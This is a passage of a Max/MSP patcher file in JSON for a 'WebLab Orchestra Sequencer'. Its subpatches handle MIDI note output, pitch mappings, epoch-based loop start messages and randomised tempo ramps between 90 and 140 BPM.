120.0, 46.0, 20.0 ], "text" : "t b i i" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-6", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 4, "outlettype" : [ "", "", "", "" ], "patching_rect" : [ 90.0, 150.0, 113.0, 20.0 ], "saved_object_attributes" : { "embed" : 0 } , "text" : "coll pitch-mappings" } } ], "lines" : [ { "patchline" : { "destination" : [ "obj-13", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-1", 0 ] } } , { "patchline" : { "destination" : [ "obj-15", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-13", 2 ] } } , { "patchline" : { "destination" : [ "obj-15", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-13", 0 ] } } , { "patchline" : { "destination" : [ "obj-6", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-13", 1 ] } } , { "patchline" : { "destination" : [ "obj-2", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-15", 0 ] } } , { "patchline" : { "destination" : [ "obj-8", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-3", 0 ] } } , { "patchline" : { "destination" : [ "obj-6", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-4", 0 ] } } , { "patchline" : { "destination" : [ "obj-15", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-6", 0 ] } } , { "patchline" : { "destination" : [ "obj-4", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-8", 0 ] } } ] } , "patching_rect" : [ 75.0, 525.0, 139.0, 23.0 ], "saved_object_attributes" : { "fontface" : 0, "fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "default_fontsize" : 12.0, "fontname" : "Arial", "globalpatchername" : "" } , "text" : "p pitch-mappings" } } , { "box" : { "color" : [ 0.945098, 0.913725, 0.407843, 1.0 ], "fontname" : "Arial Bold", "fontsize" : 14.0, "id" : "obj-16", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 2, "outlettype" : [ "float", "float" ], "patcher" : { "fileversion" : 1, "appversion" : { "major" : 5, "minor" : 1, "revision" : 9 } , "rect" : [ 663.0, 466.0, 270.0, 306.0 ], "bglocked" : 0, "defrect" : [ 663.0, 466.0, 270.0, 306.0 ], "openrect" : [ 0.0, 0.0, 0.0, 0.0 ], "openinpresentation" : 0, "default_fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "gridonopen" : 0, "gridsize" : [ 15.0, 15.0 ], "gridsnaponopen" : 0, "toolbarvisible" : 1, "boxanimatetime" : 200, "imprint" : 0, "enablehscroll" : 1, "enablevscroll" : 1, "devicewidth" : 0.0, "boxes" : [ { "box" : { "comment" : "", "id" : "obj-5", "maxclass" : "outlet", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 135.0, 210.0, 25.0, 25.0 ] } } , { "box" : { "comment" : "", "id" : "obj-4", "maxclass" : "outlet", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 60.0, 210.0, 25.0, 25.0 ] } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-15", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 135.0, 120.0, 32.5, 20.0 ], "text" : "/ 2" } } , { "box" : { "color" : [ 0.678431, 0.819608, 0.819608, 1.0 ], "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-3", "maxclass" : "newobj", "numinlets" : 0, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 135.0, 90.0, 64.0, 20.0 ], "text" : "r beat_ms" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-2", "maxclass" : "newobj", "numinlets" : 3, "numoutlets" : 2, "outlettype" : [ "float", "float" ], "patching_rect" : [ 60.0, 150.0, 94.0, 20.0 ], "text" : "makenote 100" } } , { "box" : { "comment" : "", "id" : "obj-1", "maxclass" : "inlet", "numinlets" : 0, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 60.0, 45.0, 25.0, 25.0 ] } } ], "lines" : [ { "patchline" : { "destination" : [ "obj-2", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-1", 0 ] } } , { "patchline" : { "destination" : [ "obj-2", 2 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-15", 0 ] } } , { "patchline" : { "destination" : [ "obj-4", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-2", 0 ] } } , { "patchline" : { "destination" : [ "obj-5", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-2", 1 ] } } , { "patchline" : { "destination" : [ "obj-15", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-3", 0 ] } } ] } , "patching_rect" : [ 75.0, 555.0, 88.0, 23.0 ], "saved_object_attributes" : { "fontface" : 0, "fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "default_fontsize" : 12.0, "fontname" : "Arial", "globalpatchername" : "" } , "text" : "p actuators" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-14", "linecount" : 3, "maxclass" : "comment", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 225.0, 180.0, 93.0, 48.0 ], "presentation" : 1, "presentation_rect" : [ 45.0, 240.0, 226.0, 20.0 ], "text" : "Hit spacebar to start/stop the sequencer." } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-7", "maxclass" : "comment", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 165.0, 585.0, 195.0, 20.0 ], "presentation" : 1, "presentation_rect" : [ 105.0, 180.0, 203.0, 20.0 ], "text" : "← double-click to select MIDI OUT" } } , { "box" : { "color" : [ 0.372549, 0.439216, 0.352941, 1.0 ], "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-55", "maxclass" : "newobj", "numinlets" : 3, "numoutlets" : 0, "patching_rect" : [ 75.0, 585.0, 88.0, 20.0 ], "presentation" : 1, "presentation_rect" : [ 45.0, 180.0, 51.0, 20.0 ], "text" : "noteout" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-13", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "bang" ], "patching_rect" : [ 75.0, 630.0, 60.0, 20.0 ], "text" : "loadbang" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-4", "linecount" : 2, "maxclass" : "message", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 75.0, 660.0, 91.0, 32.0 ], "text" : ";\rmax preempt 1" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-10", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 2, "outlettype" : [ "bang", "" ], "patching_rect" : [ 150.0, 210.0, 43.0, 20.0 ], "text" : "sel 32" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-9", "maxclass" : "newobj", "numinlets" : 0, "numoutlets" : 4, "outlettype" : [ "int", "int", "int", "int" ], "patching_rect" : [ 150.0, 180.0, 59.5, 20.0 ], "text" : "key" } } , { "box" : { "fontname" : "Arial", "fontsize" : 24.0, "id" : "obj-87", "maxclass" : "comment", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 30.0, 30.0, 334.0, 34.0 ], "presentation" : 1, "presentation_rect" : [ 30.0, 30.0, 338.0, 34.0 ], "text" : "WebLab Orchestra Sequencer" } } , { "box" : { "color" : [ 0.945098, 0.913725, 0.407843, 1.0 ], "fontname" : "Arial Bold", "fontsize" : 14.0, "id" : "obj-80", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patcher" : { "fileversion" : 1, "appversion" : { "major" : 5, "minor" : 1, "revision" : 9 } , "rect" : [ 381.0, 128.0, 329.0, 384.0 ], "bglocked" : 0, "defrect" : [ 381.0, 128.0, 329.0, 384.0 ], "openrect" : [ 0.0, 0.0, 0.0, 0.0 ], "openinpresentation" : 0, "default_fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "gridonopen" : 0, "gridsize" : [ 15.0, 15.0 ], "gridsnaponopen" : 0, "toolbarvisible" : 1, "boxanimatetime" : 200, "imprint" : 0, "enablehscroll" : 1, "enablevscroll" : 1, "devicewidth" : 0.0, "boxes" : [ { "box" : { "color" : [ 0.678431, 0.819608, 0.819608, 1.0 ], "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-6", "maxclass" : "newobj", "numinlets" : 0, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 105.0, 30.0, 83.0, 20.0 ], "text" : "r max-latency" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-7", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 60.0, 105.0, 64.0, 20.0 ], "text" : "pipe" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-5", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 60.0, 195.0, 70.0, 20.0 ], "text" : "pack s 0" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-3", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 2, "outlettype" : [ "bang", "int" ], "patching_rect" : [ 60.0, 135.0, 69.5, 20.0 ], "text" : "t b i" } } , { "box" : { "comment" : "", "id" : "obj-2", "maxclass" : "outlet", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 60.0, 285.0, 25.0, 25.0 ] } } , { "box" : { "comment" : "", "id" : "obj-1", "maxclass" : "inlet", "numinlets" : 0, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 60.0, 30.0, 25.0, 25.0 ] } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-11", "maxclass" : "message", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 60.0, 225.0, 70.0, 18.0 ], "text" : "/loop $1 $2" } } , { "box" : { "fontname" : "Arial Bold", "fontsize" : 12.0, "id" : "obj-4", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patcher" : { "fileversion" : 1, "appversion" : { "major" : 5, "minor" : 1, "revision" : 9 } , "rect" : [ 70.0, 69.0, 430.0, 321.0 ], "bglocked" : 0, "defrect" : [ 70.0, 69.0, 430.0, 321.0 ], "openrect" : [ 0.0, 0.0, 0.0, 0.0 ], "openinpresentation" : 0, "default_fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "gridonopen" : 0, "gridsize" : [ 15.0, 15.0 ], "gridsnaponopen" : 0, "toolbarvisible" : 1, "boxanimatetime" : 200, "imprint" : 0, "enablehscroll" : 1, "enablevscroll" : 1, "devicewidth" : 0.0, "boxes" : [ { "box" : { "comment" : "", "id" : "obj-2", "maxclass" : "outlet", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 45.0, 210.0, 25.0, 25.0 ] } } , { "box" : { "comment" : "", "id" : "obj-1", "maxclass" : "inlet", "numinlets" : 0, "numoutlets" : 1, "outlettype" : [ "bang" ], "patching_rect" : [ 45.0, 30.0, 25.0, 25.0 ] } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-75", "linecount" : 6, "maxclass" : "comment", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 165.0, 135.0, 150.0, 89.0 ], "text" : "must burn 'ms' (or any chars) into there or Max will treat it as a long, which will screw up the number because it's longer than a long. (!)" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-65", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 75.0, 120.0, 44.0, 20.0 ], "text" : "/ 1000" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-57", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 45.0, 150.0, 99.0, 20.0 ], "text" : "sprintf %i%.3ims" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-39", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 2, "outlettype" : [ "int", "int" ], "patching_rect" : [ 45.0, 90.0, 43.0, 20.0 ], "text" : "epoch" } } ], "lines" : [ { "patchline" : { "destination" : [ "obj-39", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-1", 0 ] } } , { "patchline" : { "destination" : [ "obj-57", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-39", 0 ] } } , { "patchline" : { "destination" : [ "obj-65", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-39", 1 ] } } , { "patchline" : { "destination" : [ "obj-2", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-57", 0 ] } } , { "patchline" : { "destination" : [ "obj-57", 1 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-65", 0 ] } } ] } , "patching_rect" : [ 60.0, 165.0, 58.0, 20.0 ], "saved_object_attributes" : { "fontface" : 0, "fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "default_fontsize" : 12.0, "fontname" : "Arial", "globalpatchername" : "" } , "text" : "p epoch" } } ], "lines" : [ { "patchline" : { "destination" : [ "obj-7", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-1", 0 ] } } , { "patchline" : { "destination" : [ "obj-2", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-11", 0 ] } } , { "patchline" : { "destination" : [ "obj-4", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-3", 0 ] } } , { "patchline" : { "destination" : [ "obj-5", 1 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-3", 1 ] } } , { "patchline" : { "destination" : [ "obj-5", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-4", 0 ] } } , { "patchline" : { "destination" : [ "obj-11", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-5", 0 ] } } , { "patchline" : { "destination" : [ "obj-7", 1 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-6", 0 ] } } , { "patchline" : { "destination" : [ "obj-3", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-7", 0 ] } } ] } , "patching_rect" : [ 210.0, 345.0, 93.0, 23.0 ], "saved_object_attributes" : { "fontface" : 0, "fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "default_fontsize" : 12.0, "fontname" : "Arial", "globalpatchername" : "" } , "text" : "p loop_start" } } , { "box" : { "color" : [ 0.945098, 0.913725, 0.407843, 1.0 ], "fontname" : "Arial Bold", "fontsize" : 14.0, "id" : "obj-77", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 2, "outlettype" : [ "int", "" ], "patcher" : { "fileversion" : 1, "appversion" : { "major" : 5, "minor" : 1, "revision" : 9 } , "rect" : [ 270.0, 113.0, 565.0, 564.0 ], "bglocked" : 0, "defrect" : [ 270.0, 113.0, 565.0, 564.0 ], "openrect" : [ 0.0, 0.0, 0.0, 0.0 ], "openinpresentation" : 0, "default_fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "gridonopen" : 0, "gridsize" : [ 15.0, 15.0 ], "gridsnaponopen" : 0, "toolbarvisible" : 1, "boxanimatetime" : 200, "imprint" : 0, "enablehscroll" : 1, "enablevscroll" : 1, "devicewidth" : 0.0, "boxes" : [ { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-15", "maxclass" : "comment", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 300.0, 83.0, 159.0, 20.0 ], "text" : "• optional: fluctuating tempo" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-14", "maxclass" : "message", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 180.0, 120.0, 32.5, 18.0 ], "text" : "120" } } , { "box" : { "color" : [ 0.678431, 0.819608, 0.819608, 1.0 ], "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-6", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 225.0, 90.0, 33.0, 20.0 ], "text" : "s go" } } , { "box" : { "color" : [ 0.678431, 0.819608, 0.819608, 1.0 ], "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-4", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 165.0, 390.0, 40.0, 20.0 ], "text" : "s seq" } } , { "box" : { "color" : [ 0.678431, 0.819608, 0.819608, 1.0 ], "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-9", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 300.0, 255.0, 66.0, 20.0 ], "text" : "s beat_ms" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-18", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 2, "outlettype" : [ "int", "int" ], "patching_rect" : [ 135.0, 210.0, 32.5, 20.0 ], "text" : "t i i" } } , { "box" : { "color" : [ 0.478431, 0.709804, 0.317647, 1.0 ], "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-17", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 225.0, 420.0, 95.0, 20.0 ], "text" : "pv beat_ms_val" } } , { "box" : { "color" : [ 0.478431, 0.709804, 0.317647, 1.0 ], "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-12", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 195.0, 255.0, 95.0, 20.0 ], "text" : "pv beat_ms_val" } } , { "box" : { "color" : [ 0.945098, 0.913725, 0.407843, 1.0 ], "fontname" : "Arial Bold", "fontsize" : 14.0, "id" : "obj-11", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patcher" : { "fileversion" : 1, "appversion" : { "major" : 5, "minor" : 1, "revision" : 9 } , "rect" : [ 755.0, 95.0, 348.0, 591.0 ], "bglocked" : 0, "defrect" : [ 755.0, 95.0, 348.0, 591.0 ], "openrect" : [ 0.0, 0.0, 0.0, 0.0 ], "openinpresentation" : 0, "default_fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "gridonopen" : 0, "gridsize" : [ 15.0, 15.0 ], "gridsnaponopen" : 0, "toolbarvisible" : 1, "boxanimatetime" : 200, "imprint" : 0, "enablehscroll" : 1, "enablevscroll" : 1, "devicewidth" : 0.0, "boxes" : [ { "box" : { "color" : [ 0.945098, 0.913725, 0.407843, 1.0 ], "fontname" : "Arial Bold", "fontsize" : 14.0, "id" : "obj-16", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "int" ], "patcher" : { "fileversion" : 1, "appversion" : { "major" : 5, "minor" : 1, "revision" : 9 } , "rect" : [ 92.0, 94.0, 464.0, 458.0 ], "bglocked" : 0, "defrect" : [ 92.0, 94.0, 464.0, 458.0 ], "openrect" : [ 0.0, 0.0, 0.0, 0.0 ], "openinpresentation" : 0, "default_fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "gridonopen" : 0, "gridsize" : [ 15.0, 15.0 ], "gridsnaponopen" : 0, "toolbarvisible" : 1, "boxanimatetime" : 200, "imprint" : 0, "enablehscroll" : 1, "enablevscroll" : 1, "devicewidth" : 0.0, "boxes" : [ { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-22", "maxclass" : "comment", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 255.0, 195.0, 77.0, 20.0 ], "text" : "4-10s / BPM" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-20", "linecount" : 3, "maxclass" : "comment", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 225.0, 90.0, 168.0, 48.0 ], "text" : "ramp duration is proportional to BPM change, so it doesn't move too fast." } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-12", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 3, "outlettype" : [ "int", "bang", "bang" ], "patching_rect" : [ 45.0, 90.0, 154.0, 20.0 ], "text" : "t i b b" } } , { "box" : { "comment" : "", "id" : "obj-11", "maxclass" : "inlet", "numinlets" : 0, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 143.0, 150.0, 25.0, 25.0 ] } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-13", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 45.0, 285.0, 153.5, 20.0 ], "text" : "*" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-10", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 45.0, 255.0, 30.0, 20.0 ], "text" : "abs" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-9", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 45.0, 225.0, 86.5, 20.0 ], "text" : "-" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-8", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 113.0, 195.0, 61.0, 20.0 ], "text" : "pv lastval" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-38", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 180.0, 255.0, 45.0, 20.0 ], "text" : "* 1000" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-31", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 180.0, 225.0, 32.5, 20.0 ], "text" : "+ 4" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-30", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 180.0, 195.0, 61.0, 20.0 ], "text" : "random 6" } } , { "box" : { "comment" : "", "id" : "obj-7", "maxclass" : "outlet", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 45.0, 345.0, 25.0, 25.0 ] } } , { "box" : { "comment" : "", "id" : "obj-5", "maxclass" : "inlet", "numinlets" : 0, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 45.0, 30.0, 25.0, 25.0 ] } } ], "lines" : [ { "patchline" : { "destination" : [ "obj-13", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-10", 0 ] } } , { "patchline" : { "destination" : [ "obj-8", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-11", 0 ] } } , { "patchline" : { "destination" : [ "obj-30", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-12", 2 ] } } , { "patchline" : { "destination" : [ "obj-8", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-12", 1 ] } } , { "patchline" : { "destination" : [ "obj-9", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-12", 0 ] } } , { "patchline" : { "destination" : [ "obj-7", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-13", 0 ] } } , { "patchline" : { "destination" : [ "obj-31", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-30", 0 ] } } , { "patchline" : { "destination" : [ "obj-38", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-31", 0 ] } } , { "patchline" : { "destination" : [ "obj-13", 1 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-38", 0 ] } } , { "patchline" : { "destination" : [ "obj-12", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-5", 0 ] } } , { "patchline" : { "destination" : [ "obj-9", 1 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-8", 0 ] } } , { "patchline" : { "destination" : [ "obj-10", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-9", 0 ] } } ] } , "patching_rect" : [ 120.0, 345.0, 124.0, 23.0 ], "saved_object_attributes" : { "fontface" : 0, "fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "default_fontsize" : 12.0, "fontname" : "Arial", "globalpatchername" : "" } , "text" : "p ramp-duration" } } , { "box" : { "color" : [ 0.945098, 0.913725, 0.407843, 1.0 ], "fontname" : "Arial Bold", "fontsize" : 14.0, "id" : "obj-15", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "int" ], "patcher" : { "fileversion" : 1, "appversion" : { "major" : 5, "minor" : 1, "revision" : 9 } , "rect" : [ 67.0, 69.0, 386.0, 339.0 ], "bglocked" : 0, "defrect" : [ 67.0, 69.0, 386.0, 339.0 ], "openrect" : [ 0.0, 0.0, 0.0, 0.0 ], "openinpresentation" : 0, "default_fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "gridonopen" : 0, "gridsize" : [ 15.0, 15.0 ], "gridsnaponopen" : 0, "toolbarvisible" : 1, "boxanimatetime" : 200, "imprint" : 0, "enablehscroll" : 1, "enablevscroll" : 1, "devicewidth" : 0.0, "boxes" : [ { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-5", "maxclass" : "comment", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 165.0, 120.0, 71.0, 20.0 ], "text" : "90-140bpm" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-4", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 75.0, 150.0, 34.0, 20.0 ], "text" : "+ 90" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-25", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 75.0, 120.0, 68.0, 20.0 ], "text" : "random 50" } } , { "box" : { "comment" : "", "id" : "obj-2", "maxclass" : "outlet", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 75.0, 255.0, 25.0, 25.0 ] } } , { "box" : { "comment" : "", "id" : "obj-1", "maxclass" : "inlet", "numinlets" : 0, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 75.0, 60.0, 25.0, 25.0 ] } } ], "lines" : [ { "patchline" : { "destination" : [ "obj-25", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-1", 0 ] } } , { "patchline" : { "destination" : [ "obj-4", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-25", 0 ] } } , { "patchline" : { "destination" : [ "obj-2", 0 ], "hidden" : 0, "midpoints" : [ ], "source" : [ "obj-4", 0 ] } } ] } , "patching_rect" : [ 60.0, 255.0, 102.0, 23.0 ], "saved_object_attributes" : { "fontface" : 0, "fontsize" : 12.0, "default_fontface" : 0, "default_fontname" : "Arial", "default_fontsize" : 12.0, "fontname" : "Arial", "globalpatchername" : "" } , "text" : "p new_tempo" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-2", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 2, "outlettype" : [ "int", "int" ], "patching_rect" : [ 60.0, 120.0, 49.5, 20.0 ], "text" : "t i i" } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-1", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 120.0, 300.0, 85.0, 20.0 ], "text" : "loadmess 120" } } , { "box" : { "comment" : "", "id" : "obj-7", "maxclass" : "inlet", "numinlets" : 0, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 60.0, 45.0, 25.0, 25.0 ] } } , { "box" : { "comment" : "", "id" : "obj-6", "maxclass" : "outlet", "numinlets" : 1, "numoutlets" : 0, "patching_rect" : [ 60.0, 510.0, 25.0, 25.0 ] } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-48", "maxclass" : "newobj", "numinlets" : 1, "numoutlets" : 2, "outlettype" : [ "bang", "bang" ], "patching_rect" : [ 90.0, 165.0, 54.0, 20.0 ], "text" : "togedge" } } , { "box" : { "id" : "obj-44", "maxclass" : "toggle", "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "int" ], "patching_rect" : [ 60.0, 165.0, 20.0, 20.0 ] } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-41", "maxclass" : "newobj", "numinlets" : 2, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 60.0, 210.0, 49.0, 20.0 ], "text" : "gate" } } , { "box" : { "id" : "obj-23", "maxclass" : "slider", "min" : 90.0, "numinlets" : 1, "numoutlets" : 1, "outlettype" : [ "" ], "patching_rect" : [ 90.0, 450.0, 131.0, 18.0 ], "size" : 140.0 } } , { "box" : { "fontname" : "Arial", "fontsize" : 12.0, "id" : "obj-11", "maxclass" : "newobj", "numinlets" : 3, "numoutlets" : 2, "outlettype" : [ "", "" ], "patching_rect" : [ 60.0, 390.0, 139.0, 20.0 ], "text" : "line 120. 20" } } ], "lines" : [ { 